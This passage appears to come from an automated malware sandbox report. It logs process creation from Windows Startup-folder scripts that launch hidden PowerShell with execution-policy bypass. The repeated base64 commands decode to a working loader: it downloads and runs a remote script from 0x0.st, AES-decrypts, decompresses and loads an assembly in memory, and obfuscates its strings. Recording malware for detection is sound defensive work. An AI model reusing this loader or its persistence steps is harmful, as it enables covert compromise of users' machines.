kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat" Jump to behavior
